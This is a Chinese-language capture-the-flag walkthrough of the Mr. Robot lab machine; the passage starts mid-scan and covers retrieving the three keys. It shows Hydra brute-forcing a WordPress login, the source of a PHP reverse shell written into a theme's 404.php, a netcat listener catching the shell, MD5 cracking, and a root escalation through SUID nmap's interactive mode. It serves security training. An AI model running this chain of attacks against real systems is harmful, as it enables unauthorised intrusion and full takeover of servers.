[09:43:42] 301 -    0B  - /xampp/phpmyadmin/index.php  ->  http://192.168.12.130/xampp/phpmyadmin/
[09:43:42] 405 -   42B  - /xmlrpc.php
[09:43:42] 405 -   42B  - /xmlrpc

Task Completed

---

扫描器的话可以使用feroxbuster、dirbuster、gobuster、dirsearch、dirb等。

---

经过一系列信息收集之后，我们开始进行web渗透。

---

WEB

80端口

---

这个太酷了，强烈推荐这台靶机！

---

---

robots.txt文件

---

---

key-1-of-3.txt  -> 073403c8a58a1f80d943455fb30724b9


key-1-of-3.txt应该是第一个key，fsocity.dic是一个字典文件。

---

wget命令

使用wget命令分别把这两个文件下载一下！

┌──(root㉿ru)-[~/kali]
└─# wget http://192.168.12.130/key-1-of-3.txt
--2023-12-12 09:57:22--  http://192.168.12.130/key-1-of-3.txt
正在连接 192.168.12.130:80... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：33 [text/plain]
正在保存至: “key-1-of-3.txt”

key-1-of-3.txt      100%[===================>]      33  --.-KB/s  用时 0s

2023-12-12 09:57:22 (5.12 MB/s) - 已保存 “key-1-of-3.txt” [33/33])


┌──(root㉿ru)-[~/kali]
└─# wget http://192.168.12.130/fsocity.dic
--2023-12-12 09:57:39--  http://192.168.12.130/fsocity.dic
正在连接 192.168.12.130:80... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：7245381 (6.9M) [text/x-c]
正在保存至: “fsocity.dic”

fsocity.dic         100%[===================>]   6.91M  --.-KB/s  用时 0.1s

2023-12-12 09:57:39 (56.9 MB/s) - 已保存 “fsocity.dic” [7245381/7245381])

---

uniq命令

使用uniq命令对字典进行去重。

┌──(root㉿ru)-[~/kali]
└─# cat fsocity.dic | uniq >> dic.txt

┌──(root㉿ru)-[~/kali]
└─# cat dic.txt | uniq -d

先使用uniq命令进行去重并重定向到dic.txt文件中，再使用 -d 参数进行检查；
-d ： 列出哪些行是重复的

---

hash-identifier

┌──(root㉿ru)-[~/kali]
└─# hash-identifier 073403c8a58a1f80d943455fb30724b9
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   [email protected] #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
 HASH: ^C

        Bye!

---

key-1-of-3.txt  -> 073403c8a58a1f80d943455fb30724b9  很有可能是MD5

---

从之前的nikto探测结果来看，该靶机还存在wordpress。

---

---

尝试使用一些弱密码，但是失败了。我们先尝试进行暴力破解！

---

Burp Suite

---

可以使用bp爆破也可以使用hydra进行爆破，这里使用hydra 的 http-ppst-from 模块进行爆破。

---

hydra

┌──(root㉿ru)-[~/kali]
└─# hydra -L dic.txt -p test 192.168.12.130 http-post-form "/wp-login:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=https%3A%2F%2F192.168.12.130%2Fwp-admin%2F&testcookie=1:F=Invalid username"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-12 10:50:49
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 858235 login tries (l:858235/p:1), ~53640 tries per task
[DATA] attacking http-post-form://192.168.12.130:80/wp-login:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=https%3A%2F%2F192.168.12.130%2Fwp-admin%2F&testcookie=1:F=Invalid username
[80][http-post-form] host: 192.168.12.130   login: Elliot   password: test
[80][http-post-form] host: 192.168.12.130   login: elliot   password: test
[STATUS] 3033.00 tries/min, 3033 tries in 00:01h, 855202 to do in 04:42h, 16 active
[80][http-post-form] host: 192.168.12.130   login: ELLIOT   password: test
[STATUS] 3027.00 tries/min, 9081 tries in 00:03h, 849154 to do in 04:41h, 16 active
The session file ./hydra.restore was written. Type "hydra -R" to resume session.

---

test是测试密码，我们爆破出了三个账号

Elliot   elliot   ELLIOT   

---

hydra 密码爆破

┌──(root㉿ru)-[~/kali]
└─# hydra -l Elliot -P dic.txt 192.168.12.130 http-post-form "/wp-login:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=https%3A%2F%2F192.168.12.130%2Fwp-admin%2F&testcookie=1:F=is incorrect"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-12 11:12:04
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:1/p:11452), ~716 tries per task
[DATA] attacking http-post-form://192.168.12.130:80/wp-login:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=https%3A%2F%2F192.168.12.130%2Fwp-admin%2F&testcookie=1:F=is incorrect
[STATUS] 2710.00 tries/min, 2710 tries in 00:01h, 8742 to do in 00:04h, 16 active
[80][http-post-form] host: 192.168.12.130   login: Elliot   password: ER28-0652
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-12 11:14:18

---

经过测试，三个用户的密码都是 ER28-0652 ，所以我们直接登录后台即可！

---

wordpress

登录成功

---

写入shell

---

遇到wordpress无非是写入木马，反弹shell，一般在插入新模板处、404.php可编辑文件中。这里采用写入木马到404.php文件中，然后进行反弹shell。

---

shell

 array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
  printit("ERROR: Can't spawn shell");
  exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
  if (feof($sock)) {
    printit("ERROR: Shell connection terminated");
    break;
  }

  if (feof($pipes[1])) {
    printit("ERROR: Shell process terminated");
    break;
  }

  $read_a = array($sock, $pipes[1], $pipes[2]);
  $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

  if (in_array($sock, $read_a)) {
    if ($debug) printit("SOCK READ");
    $input = fread($sock, $chunk_size);
    if ($debug) printit("SOCK: $input");
    fwrite($pipes[0], $input);
  }

  if (in_array($pipes[1], $read_a)) {
    if ($debug) printit("STDOUT READ");
    $input = fread($pipes[1], $chunk_size);
    if ($debug) printit("STDOUT: $input");
    fwrite($sock, $input);
  }

  if (in_array($pipes[2], $read_a)) {
    if ($debug) printit("STDERR READ");
    $input = fread($pipes[2], $chunk_size);
    if ($debug) printit("STDERR: $input");
    fwrite($sock, $input);
  }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
  if (!$daemon) {
    print "$string\n";
  }
}

?>

---

---

写完记得保存。

404.php默认文件在  /wp-content/themes/your-theme-name/  这个路径下。我们kali开启监听，访问404.php页面。

---

反弹shell

1、http://192.168.12.130/wp-content/themes/your-theme-name/404.php



2、
┌──(root㉿ru)-[~/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.12.130: inverse host lookup failed: Unknown host
connect to [192.168.12.128] from (UNKNOWN) [192.168.12.130] 35131
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 03:25:57 up  2:16,  0 users,  load average: 0.02, 0.29, 0.72
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$

---

提权

1、系统探索

$ python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/$ ls
ls
bin   dev  home        lib    lost+found  mnt  proc  run   srv  tmp  var
boot  etc  initrd.img  lib64  media       opt  root  sbin  sys  usr  vmlinuz
daemon@linux:/$


使用python提高交互性

---

daemon@linux:/$ cd /home
cd /home
daemon@linux:/home$ ls
ls
robot
daemon@linux:/home$ cd robot
cd robot
/home/robot
daemon@linux:/home/robot$ ls
ls
key-2-of-3.txt  password.raw-md5
daemon@linux:/home/robot$ cat key-2-of-3.txt
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

在home目录下发现一个用户，而且用户文件夹里还有两个文件，有一个不可以看，只有password.raw-md5可以看。
看起来应该是robot的密码。
尝试去爆破一下！

---

---

robot:abcdefghijklmnopqrstuvwxyz 

可以使用john也可以使用在线md5爆破！

---

daemon@linux:/home$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:/home$ cd robot
cd robot
robot@linux:~$ ls
ls
key-2-of-3.txt  password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

---

拿到第二个key

---

2、本地提权

robot@linux:~$ uname -a
uname -a
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

robot@linux:~$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.2 LTS
Release:        14.04
Codename:       trusty

robot@linux:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

robot@linux:/etc$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
53 * * * * bitnami cd /opt/bitnami/stats && ./agent.bin --run -D
robot@linux:/etc$

robot@linux:/etc$ sudo -l
sudo -l
[sudo] password for robot: abcdefghijklmnopqrstuvwxyz

Sorry, user robot may not run sudo on linux.

---

分别查看内核版本、可提权文件、计划任务、sudo提权等。

---

我们用find命令查看到了nmap提权，我们尝试一下。

---

---

nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )
robot@linux:/etc$

看到nmap版本是3.81，我们尝试使用b方法进行提权

nmap --interactive
nmap> !sh

---

get root

robot@linux:/etc$ nmap --version
nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )
robot@linux:/etc$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# cd /root
cd /root
# ls
ls
firstboot_done  key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
#

---

总结

信息收集  -->  wordpress爆破  -->  反弹shell  -->  本地提权